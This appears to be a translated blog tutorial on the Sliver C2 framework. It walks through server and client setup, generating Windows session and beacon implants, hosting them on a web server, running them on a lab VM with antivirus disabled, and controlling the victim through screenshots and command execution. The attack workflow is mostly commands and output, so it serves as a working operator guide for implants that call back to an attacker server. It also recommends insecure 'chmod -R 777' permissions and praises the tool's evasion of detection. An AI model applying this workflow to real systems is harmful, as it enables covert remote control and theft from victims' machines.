Sliver C2: Detailed tutorial

This article contains a detailed analysis of the sensational tool Sliver in 2023, which is gaining popularity among hackers. More details about this are described in the news hacker.ru. Happy reading!

Disclaimer: All methods used in the article are demonstrated for educational purposes

What is Sliver C2

Sliver C2 is an open source Red Team framework, developed cybersecurity company BishopFox is a cross-platform post-exploitation framework based on Golang.
It is used to perform the second stage of a chain of attacks on the internal network (when the victim’s computer has already been compromised by available means) and is an alternative to such commercial tools as CobaltStrikeas the manufacturers themselves claim.

General concepts:

• implant – the load used to maintain access privileges on the victim’s computer;

• beacon – a load operating in beacon mode, ensuring regular connection to the server;

• stage – loading method, staged or non-staged.

Operating modes:
1. Beacon mode: implements an asynchronous communication method and regularly checks its status;
2. Session mode: implements real-time session mode.

Advantages:
1. Modularity, provides many extensions, for example, various third-party tools can be installed in the arsenal (BOF, .NET tools, etc.)
2. Multiplayer, allowing you to work in a group of several users at the same time;
3. Open source;
4. Cross-platform (supported on Linux, Windows and MacOS)

Sliver C2 architecture

The Sliver C2 architecture consists of three parts:

• Server Sliver C2. The Sliver C2 server is part of the sliver-server executable, manages the internal database, and starts and stops network listeners. The main interface for interaction with the server is the gRPC interface; all functions are implemented through it.

• Client Console. The client console is the main user interface for interacting with the Sliver C2 server.

• Implants. Implants are malicious code, payloads, (exe, ps1, etc.) that run on the target system. The relationship and form of interaction of each part can be shown as follows:

Installation of Sliver C2

You can install this tool using this link https://github.com/BishopFox/sliver.
You can view and download the release you need using the link: https://github.com/BishopFox/sliver/releases
It is officially recommended to deploy the Server on Linux (Windows is not recommended). Simply find the appropriate version and download the Server and Client versions.
Sliver has two additional features that require external dependencies: MinGW and Metasploit.

1. To enable DLL payloads (on Linux servers) you need to install MinGW: sudo apt install mingw-w64

2. To enable some MSF integration features, you must also install Metasploit: wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run After this, we can safely start our server with the command: ./sliver-server_linux

If you are working alone, the installation is complete and you can directly run the appropriate commands in the terminal. But if you are working in a group with multiple clients, the following steps are necessary.

Create a configuration file for the client:
new-operator --name <имя_клиента> --lhost <IP_сервера>
and also install multi-user mode:
sliver > multiplayer

After this, we will create a configuration file with the name of our client and the server IP address: Bob_192.168.1.142.cfg

Client installation:
Now we need to install sliver_clientin order to boot from our client.
When running it, we will need to import the configuration file we just created:
./sliver-client_linux import /home/kali/Desktop/Bob_192.168.1.142.cfg
After this we run the command:
./sliver-client_linux
And we see that we have connected to the session:

Operation example

Note: The example will not show options for bypassing anti-virus protection, but only the operation of this tool for familiarization. Therefore, at the time of operation, we will turn off the protective equipment.

Preparing the target

Go to Microsoft Windows Evaluation Center and download the Windows image. Personally, I used a Windows 10 Enterprise image. Use it to create a Windows virtual machine. All you need is a basic installation. The exact status of the build and patch doesn’t really matter at this point.

After installation, I recommend disabling all security features. If antivirus is enabled, your standard Sliver implants will die immediately upon launch or not work at all. This is what it should look like:

On your C2 server, start the web server:

systemctl start apache2

Note: You can also use a regular python http server:
python3 -m http.server 80

Both options will be correct.

Now we can copy the implants we created to the folder /var/www/html and they will be available to Apache. To avoid errors with access rights, I advise you to write: chmod -R 777 /var/www/html.

Also, make a note of your C2 server’s IP address. In my case 192.168.1.142
On the target Windows machine, confirm that you can access the C2 server. Open your browser and try connecting to the C2 server on port 80. If everything works, the default Apache page should load:

To receive a session, you can generate an implant, deliver it to the target and execute it there.

Creation of an implant

The implant is generated on the C2 server using the command generate. Connect to it and register help generateto read the extensive man page and learn about all the flags. The most important of them are the following:

• --mtls 192.168.1.142: Specifies that the implant should connect to the Sliver server using a TLS connection with mutual authentication. There are also alternatives to TLS:

• --os windows: indicates that we want to run the implant on Windows (this is the default value, so we can omit this parameter). MacOS and Linux are also supported.

• --arch amd64: indicates that we need a 64-bit implant (also the default value, can be omitted). In addition there is --arch 386 for 32-bit.

• --format exe: Indicates that we need an executable file (again the default). Other options:

  • --format shared for dynamic libraries;

  • --format service Windows service binary file (can be used with the command psexec) And shellcode (Windows only).

• --save /var/www/html/: Specifies the directory to save the binary file.

Here is an example of generating a binary file that Sliver generated (the file name is chosen randomly) MEDICAL_CHANGE.exe:

sliver > generate --mtls 192.168.1.142 --os windows --arch amd64 --format exe --save /var/www/html

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/MEDICAL_CHANGE.exe

File /var/www/html/MEDICAL_CHANGE.exe will not be accessible to the Apache server, so to make it accessible, write sudo chown www-data:www-data /var/www/html/MEDICAL_CHANGE.exe.
Now start the mTLS listener on the C2 server using the command mtls(by default the listener runs on port 8888). You can view listeners using the command jobs:

sliver > mtls

[*] Starting mTLS listener ...
sliver > 
[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port 
==== ====== ========== ======
 1    mtls   tcp        8888

On server C2 you can also verify that port 8888 is now open:

┌──(root㉿kali)-[~/github/sliver]
└─# netstat -antop | grep 8888 
tcp6   0   0 :::8888      :::*      LISTEN   3434/sliver-server   off (0.00/0/0)

Delivery and installation of the implant

On the target Windows system, open a browser and download the implant. Edge will warn you that this is not a regular file. You need to click on the three dots, then “Save” to confirm the download, and then confirm the second Defender SmartScreen warning with “Save Anyway”. Then click “Open File” (or navigate to the file in Explorer and double-click it). This will trigger another SmartScreen warning. Confirm again by clicking “Run anyway”:

After this, your implant should work. On the C2 server in Sliver you should see a line like this, which indicates that the implant session is established:

[*] Session 971c5a23 MEDICAL_CHANGE - 192.168.1.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:36:48 CEST

You can also run the command sessionsto view the list of sessions:

sliver > sessions

 ID         Transport   Remote Address          Hostname          Username    
========== =========== ======================= ================= ========== 
 971c5a23   mtls        192.168.1.160:50051   DESKTOP-IPQVF9T   tester     
 
 Operating System   Health 
================== =========
 windows/amd64      [ALIVE]

Using a session

You can use your session using the command use. Simply enter it and an interactive prompt will appear allowing you to select a session. Press Enter again and your prompt will change to the name of the implant. MEDICAL_CHANGE in my case. The session is now active and ready to receive your commands. By using info you can get detailed load information:

sliver > use

? Select a session or beacon: SESSION  971c5a23  MEDICAL_CHANGE  192.168.1.160:50051  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active session MEDICAL_CHANGE (971c5a23-73e0-4418-b9c2-266484546e0d)

sliver (MEDICAL_CHANGE) > info

        Session ID: 971c5a23-73e0-4418-b9c2-266484546e0d
              Name: MEDICAL_CHANGE
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 7244
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.1.142:8888
    Remote Address: 192.168.1.160:50051
         Proxy URL: 
Reconnect Interval: 1m0s

Sliver implants support multiple commands. You can get a complete list using help. Features include file system exploration, file copying and downloading, port forwarding, screenshotting, and more.
For example, we can take a screenshot of the victim’s desktop with the command screenshotand it will write to your server:

sliver (MEDICAL_CHANGE) > screenshot

[*] Screenshot written to /tmp/screenshot_DESKTOP-IPQVF9T_20220701224728_3343901839.png (893.2 KiB)

Then you can view the screenshot on the C2 server:
When you finish your session, write down backgroundbut the session will still remain active.

To actually end the session, run session -kand then the session ID:

sliver > sessions

 ID         Transport   Remote Address          Hostname          Username    
========== =========== ======================= ================= ========== 
 971c5a23   mtls        192.168.1.160:50051   DESKTOP-IPQVF9T   tester     
 
 Operating System   Health 
================== =========
 windows/amd64      [ALIVE] 

sliver > sessions -k 971c5a23

[!] Lost session 971c5a23 MEDICAL_CHANGE - 192.168.122.160:50051 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 22:52:53 CEST

Beacons

Creating a beacon:

Creating a beacon implant is very similar to creating a session implant. You are using the command generate beacon. Learn all about flags with help generate beacon. In addition to all the flags listed above, the relevant beacon flags are:

• --seconds 5: Specifies that the beacon should contact the C2 server every 5 seconds. Also you can use --minutes or --hours, --days

• --jitter 3: Specifies that an additional random delay of up to 3 seconds should be added to the 5 second interval.

sliver > generate beacon --mtls 192.168.1.142 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/STALE_PNEUMONIA.exe

Don’t forget to register sudo chown www-data:www-data /var/www/html/STALE_PNEUMONIA.exeto make the load available to Apache.

Delivery and installation of a beacon implant

This step is the same as for a sessional implant. Just download and run the file. After this you should see the process running STALE_PNEUMONIA.exe:

Sliver confirms the beacon connection with the following line:

[*] Beacon c9b67cda STALE_PNEUMONIA - 192.168.1.160:50080 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:08:31 CEST

Run the command beaconsto get a list of active beacons:

sliver > beacons

 ID         Name              Transport   Username   Operating System  
========== ================= =========== ========== ================== 
 c9b67cda   STALE_PNEUMONIA   mtls        tester     windows/amd64     
  
  Last Check-In   Next Check-In 
=============== ===============
  1s ago          5s

Using a beacon

As with the session, run the command use, select the beacon you want to interact with and press Enter. The tooltip will change to the name of the beacon and you will be able to get more information info :

sliver > use

? Select a session or beacon: BEACON  c9b67cda  STALE_PNEUMONIA  192.168.1.160:50080  DESKTOP-IPQVF9T  DESKTOP-IPQVF9T\tester  windows/amd64
[*] Active beacon STALE_PNEUMONIA (c9b67cda-75eb-4c30-8920-d743533266fc)

sliver (STALE_PNEUMONIA) > info

         Beacon ID: c9b67cda-75eb-4c30-8920-d743533266fc
              Name: STALE_PNEUMONIA
          Hostname: DESKTOP-IPQVF9T
              UUID: d512a12c-6b6d-4f19-814e-1f60088e9563
          Username: DESKTOP-IPQVF9T\tester
               UID: S-1-5-21-2966923018-1740081829-2498838087-1001
               GID: S-1-5-21-2966923018-1740081829-2498838087-513
               PID: 1748
                OS: windows
           Version: 10 build 19044 x86_64
              Arch: amd64
         Active C2: mtls://192.168.1.142:8888
    Remote Address: 192.168.1.160:50080
         Proxy URL: 
          Interval: 5s
            Jitter: 3s

Use the command helpto view a list of all available commands. In the example below I opened notepad execute notepadand to check if it works I took a screenshot screenshot. Indeed, you can see that notepad has been opened:

Notice how each command turns into a task. Since the beacon connection is not persistent, you will have to wait for the next registration until your commands are completed. To see a list of all tasks and their status, use the command tasks. This example shows that both commands completed successfully:

sliver (STALE_PNEUMONIA) > tasks

 ID         State       Message Type   Created                         
========== =========== ============== ================================  
 93764fdb   completed   Screenshot     Fri, 01 Jul 2022 23:15:23 CEST    
 35d81817   completed   Execute        Fri, 01 Jul 2022 23:14:35 CEST  

 Sent                             Completed                      
 =============================== ===============================
  Fri, 01 Jul 2022 23:15:28 CEST Fri, 01 Jul 2022 23:15:28 CEST 
  Fri, 01 Jul 2022 23:14:36 CEST Fri, 01 Jul 2022 23:14:36 CEST
  

You can now disable the beacon in the background, just like in a session.

From beacons to sessions

To switch from beacon mode to session mode, just use the command interactive. To illustrate, let’s assume you just received a beacon like the one below:

[*] Beacon 50010ca8 mtlsbeacon - 192.168.122.160:50422 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:24:17 CEST

sliver > beacons

 ID         Name         Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ============ =========== ========== ================== ===============
 50010ca8   mtlsbeacon   mtls        tester     windows/amd64      4s ago        

 Next Check-In
 ===============
   1m11s         

sliver > sessions

[*] No sessions

If we don’t have a running session, then you just need to use a beacon use and enter interactive. This queues a new task that will attempt to establish a session. Now wait for the next connection and a new session should appear:

sliver > use 50010ca8-d96d-4cff-81da-756c1e680fc2

[*] Active beacon mtlsbeacon (50010ca8-d96d-4cff-81da-756c1e680fc2)

sliver (mtlsbeacon) > interactive

[*] Using beacon's active C2 endpoint: mtls://192.168.1.142:8888
[*] Tasked beacon mtlsbeacon (a050cc2a)

[*] Session ab1ecb8a mtlsbeacon - 192.168.122.160:50425 (DESKTOP-IPQVF9T) - windows/amd64 - Fri, 01 Jul 2022 23:25:32 CEST

sliver (mtlsbeacon) > sessions

 ID         Transport   Remote Address          Hostname          Username   Operating System   Health  
========== =========== ======================= ================= ========== 
 ab1ecb8a   mtls        192.168.1.160:50425   DESKTOP-IPQVF9T   tester     
 
 Operating System   Health 
 ================== =========
 windows/amd64      [ALIVE]

By default, the session will be created using the same C2 protocol used by the beacon. However, it was possible to specify another one, provided that its support was compiled into the implant (yes, more than one C2 protocol can be specified at the same time). Enter interactive --help to see all options.

Profiles

Creating an implant can be tedious because you have to enter so many options. To make things easier, define reusable profiles with a common implant configuration. I’ll demonstrate this below for session and beacon implants.
Create a session implant profile using profiles new. For example, this profile corresponds to the session implant created above:

sliver (STALE_PNEUMONIA) > profiles new --mtls 192.168.1.142 --os windows --arch amd64 --format exe session_win_default

[*] Saved new implant profile session_win_default

By using profiles generate From this profile you can create a new session implant. For example:

sliver (STALE_PNEUMONIA) > profiles generate --save /var/www/html/ session_win_default

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/CAUTIOUS_UNITY.exe

By using profiles new beaconyou can also create a beacon profile:

sliver > profiles new beacon --mtls 192.168.1.142 --os windows --arch amd64 --format exe  --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

Create a beacon implant:

sliver > profiles generate --save /var/www/html/ beacon_win_default

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 00:00:18
[*] Implant saved to /var/www/html/WELSH_SECURE.exe

To view all the implants you have generated, use the command implants:

sliver > implants

 Name              Implant Type   OS/Arch             Format   
================= ============== =============== ============ ================================= =======
 CAUTIOUS_UNITY    session        windows/amd64   EXECUTABLE 
 MEDICAL_CHANGE    session        windows/amd64   EXECUTABLE 
 STALE_PNEUMONIA   beacon         windows/amd64   EXECUTABLE 
 WELSH_SECURE      beacon         windows/amd64   EXECUTABLE

Command & Control                 Debug 
================================= =======
[1] mtls://192.168.1.142:8888   false 
[1] mtls://192.168.1.142:8888   false 
[1] mtls://192.168.1.142:8888   false 
[1] mtls://192.168.1.142:8888   false 

Conclusion

In my opinion, the biggest advantage of Sliver is that it is more difficult for the system to detect, which cannot be said about other tools. In addition, it is cross-platform and easier to install. However, the downside is its generated shell, which is quite large compared to other frameworks. The framework itself is quite similar to CobaltStrike, but surpasses it due to its great functionality.